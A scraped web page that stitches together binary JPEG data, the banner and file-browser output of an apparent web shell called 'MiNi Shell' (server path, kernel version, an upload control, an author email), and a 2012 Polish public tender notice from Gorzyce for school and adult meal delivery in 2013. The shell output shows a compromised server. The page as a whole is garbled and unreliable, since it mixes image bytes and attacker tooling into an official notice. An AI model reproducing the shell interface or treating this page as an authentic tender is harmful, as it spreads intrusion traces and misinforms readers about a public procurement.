JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121115/452126-N-2012.html

<p class="kh_header"><b>Gorzyce: Dożywianie dzieci i osób dorosłych z terenu Gminy Gorzyce
w roku 2013</b><br>
<b>Numer ogłoszenia: 452126 - 2012; data zamieszczenia: 15.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Raciborska 27, 44-350 Gorzyce, woj. śląskie, tel. 32 45 11 671, faks 32 45 11 671.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie dzieci i osób dorosłych z terenu Gminy Gorzyce
w roku 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia składa się z II zadań:
Zadanie I. 
1.1 Przedmiotem zamówienia jest przygotowanie i dostarczanie posiłków dla dzieci objętych dożywianiem w 5 szkołach i jednym oddziale przedszkolnym na terenie Gminy Gorzyce, w dniach nauki szkolnej. Prognozowana liczba dzieci objętych dożywianiem wynosi 46. Średnioroczna szacunkowa liczba posiłków dla dzieci w szkołach wyniesie 8 464 szt. Dożywianie dzieci odbywać się będzie od poniedziałku do piątku w dni nauki szkolnej poczynając od 2 stycznia 2013 r. do czerwca 2013 i od 2 września 2013 do 20 grudnia 2013 r.
Prognozowana dzienna ilość posiłków dla poszczególnych placówek wynosi łącznie 46, w tym:
1)	Szkoła Podstawowa im. Wincentego Woźniaka w Czyżowicach - 9 
2)	Szkoła Podstawowa nr 2 w Gorzycach (Kolonia Fryderyk) - 12,
3)	Oddział Przedszkolny przy Szkole Podstawowej nr 2 w Gorzycach (Kolonia Fryderyk) - 6
4)	Szkoła Podstawowa Rogów - 13, 
5)	Gimnazjum w Rogowie - 5, 
6)	Gimnazjum w Czyżowicach - 1 
1.2. Usługa będzie polegała na przygotowaniu, dostarczeniu i wydaniu w w/w placówkach dwudaniowych posiłków składających z: 
a)	zupy 350 ml - codziennie
b)	mięsa lub jego porcji + ziemniaki/kluski śląskie/kopytka/kasza lub ryż + surówka + napój lub kompot - 3 razy w tygodniu, o następującej gramaturze:
- mięso lub jego porcja - 100 gram 
- ziemniaki/kluski śląskie/kopytka - 150 gram 
- kasza, ryż - 100 gram 
- surówka - 100 gram , 
- napój lub kompot - 200 ml. 
c) pierogów, naleśników z nadzieniem, krokietów lub dań z makaronem o gramaturze 200 gram + napój lub kompot - 2 razy w tygodniu
1.3. Zamawiający nie dopuszcza, aby w ciągu jednego tygodnia (5 dni nauki szkolnej) wystąpiła powtarzalność tego samego dania lub zupy.
1.4. Posiłki przygotowywane przez Wykonawcę pod względem technologii wykonania i jakości, spełniać muszą normy określone przez Instytut Żywności i Żywienia Dzieci i Młodzieży. 
1.5. Posiłki muszą posiadać wymaganą przepisami kaloryczność, być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego, muszą być wykonane ze świeżych produktów spożywczych posiadających aktualne terminy przydatności do spożycia.
1.6. Wykonawca będzie zobowiązany do przygotowania i przedstawienia zleceniodawcy (Kierownikowi Ośrodka Pomocy Społecznej w Gorzycach) z co najmniej tygodniowym wyprzedzeniem, jadłospisów dotyczących menu posiłków w poszczególnych dniach.
1.7. W okresie dożywiania liczba posiłków może ulegać zmianie tj zwiększeniu lub zmniejszeniu do 40 %. 
1.8. Godziny dostarczania posiłków ostatecznie Wykonawca ustali z Dyrektorami poszczególnych placówek, jednakże muszą one obejmować przedział czasowy pomiędzy godziną 10.00 a 13.00
1.9. Przygotowywanie i dostarczanie gorących posiłków musi być wykonywane przez kadrę posiadającą wymagane kwalifikacje zawodowe oraz w oparciu o własną bazę kuchenną do sporządzania posiłków.
1.10. Posiłki będą wydawane przez wykonawcę na terenie poszczególnych placówek w miejscu wskazanym przez Dyrektora.
1.11. Posiłki Wykonawca będzie dostarczał we własnym zakresie, na własny koszt, środkami transportu przystosowanymi do przewozu żywności, spełniając przy tym wszelkie wymogi sanitarno - higieniczne, we własnych specjalistycznych termosach gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw. Dostawa może odbywać się także w jednorazowych naczyniach zapewniających właściwą ochronę i temperaturę, lecz w takiej sytuacji Wykonawca będzie odbierał z placówek zużyte naczynia. 
1.12. Wykonawca dostarcza i odbiera naczynia i sztućce potrzebne do spożywania wydawanych posiłków. 
1.13. Wykonawca będzie ponosił koszty załadunku, rozładunku i wydawania wszystkich dostaw posiłków w obsługiwanych placówkach a także koszty i odpowiedzialność za czystość używanych termosów i naczyń wielokrotnego użytku, jeśli takie będą używane.
1.14. Informacje o pojedynczych zmianach w liczbie dostarczanych posiłków (zwiększenie do 4 sztuk dziennie) Zamawiający (Kierownik Ośrodka Pomocy Społecznej w Gorzycach lub osoby przez niego upoważnione), będzie przekazywać Wykonawcy w terminie z co najmniej 1 dniowym wyprzedzeniem, zaś informacje o większej zmianie w ilości dostaw posiłków (zmniejszenie lub zwiększenie) będą przekazywane Wykonawcy z co najmniej 2 dniowym wyprzedzeniem na adres mailowy, telefonicznie lub faksem. 
Zadanie II.
2.1. Przedmiotem zamówienia jest usługa przygotowywania, dostarczania i wydawania gorących posiłków dla osób dorosłych z terenu Gminy Gorzyce, w dni robocze od poniedziałku do piątku, w godzinach pomiędzy 10.00 a 15.00, w okresie od 02.01.2013 do 31.12.2013 r.
Prognozowana liczba posiłków dziennie to 11 sztuk, zaś średnio w roku 2013 przewiduje się wydanie 2 600 sztuk gorącego posiłku.
2.2. Posiłki będą dostarczane i wydawane przez Wykonawcę do mieszkań osób uprawnionych z terenu Gminy Gorzyce, zgodnie z wykazem, który Zamawiający przekaże Wykonawcy po podpisaniu umowy. Aktualnie posiłki dowożone są do następujących miejscowości: Turza Śl., Gorzyce, Osiny, Gorzyczki, Czyżowice, Kolonia Fryderyk, Olza, jednakże miejscowości dowozu posiłku może ulec zmianie.
2.3.Zamawiajacy wymaga, aby posiłek dwudaniowy składał się z: 
c)	zupy 500 ml - codziennie
d)	mięsa lub jego porcji + ziemniaki/kluski śląskie/kopytka/kasza lub ryż + surówka - 3 razy w tygodniu, o następującej gramaturze:
- mięso lub jego porcja - 100 gram 
- ziemniaki/kluski śląskie/kopytka - 250 gram 
- kasza, ryż - 250 gram 
- surówka - 100 gram , 
c)	pierogów, naleśników z nadzieniem, krokietów lub dań z makaronem o minimalnej gramaturze 500 gram - 2 raz w tygodniu
2.4. Zamawiający nie dopuszcza aby w ciągu jednego tygodnia wystąpiła powtarzalność tego samego zestawu obiadowego. 
2.5. Posiłki przygotowane przez Wykonawcę pod względem technologii wykonania i jakości, spełniać muszą normy określone w ustawie o bezpieczeństwie żywności i żywienia (tekst jednolity Dz. U. z 2010 r. Nr 136, poz. 914 z późn. zm. ) łącznie z przepisami wykonawczymi do tej ustawy.
2.6. Posiłki muszą posiadać wymaganą przepisami kaloryczność, być sporządzane zgodnie z wymogami sztuki kulinarnej i sanitarnej dla żywienia zbiorowego, muszą być wykonane ze świeżych produktów spożywczych posiadających aktualne terminy przydatności do spożycia
2.7. Wykonawca będzie zobowiązany do przygotowania i przedstawienia zleceniodawcy z co najmniej tygodniowym wyprzedzeniem, jadłospisów dotyczących dożywiania w poszczególnych dniach . 
2.8. W okresie dożywiania liczba posiłków może ulegać zmianie tj. zwiększeniu lub zmniejszeniu do 30 %. 
2.9. Przygotowywanie i dostarczanie gorących posiłków musi być wykonywane przez kadrę posiadającą wymagane kwalifikacje zawodowe oraz w oparciu o własną bazę kuchenną do sporządzania posiłków. 
2.10. Posiłki dla osób dorosłych Wykonawca będzie dostarczał i wydawał we własnym zakresie, na własny koszt, w jednorazowych naczyniach zapewniających właściwą ochronę i temperaturę oraz środkami transportu przystosowanymi do przewozu żywności, spełniając przy tym wszelkie wymogi sanitarno - higieniczne.
2.11. Informacje o zmianach w liczbie dostarczanych posiłków (zwiększenie lub zmniejszenie ilości) Zamawiający (Kierownik Ośrodka Pomocy Społecznej w Gorzycach lub osoby przez niego upoważnione), będzie przekazywać Wykonawcy w terminie z co najmniej 1 dniowym wyprzedzeniem, na adres mailowy, telefonicznie lub faksem..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Do 50% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.52.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania tego warunku wymaga potwierdzenia zrealizowania w okresie ostatnich trzech lat co najmniej jednej usługi o łącznej wartości rocznej minimum 50 000 zł netto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.opsgorzyce.pl/ogłoszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej ul. Raciborska 27, 44-350 Gorzyce - Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2012 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej ul. Raciborska 27, 44-350 Gorzyce - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com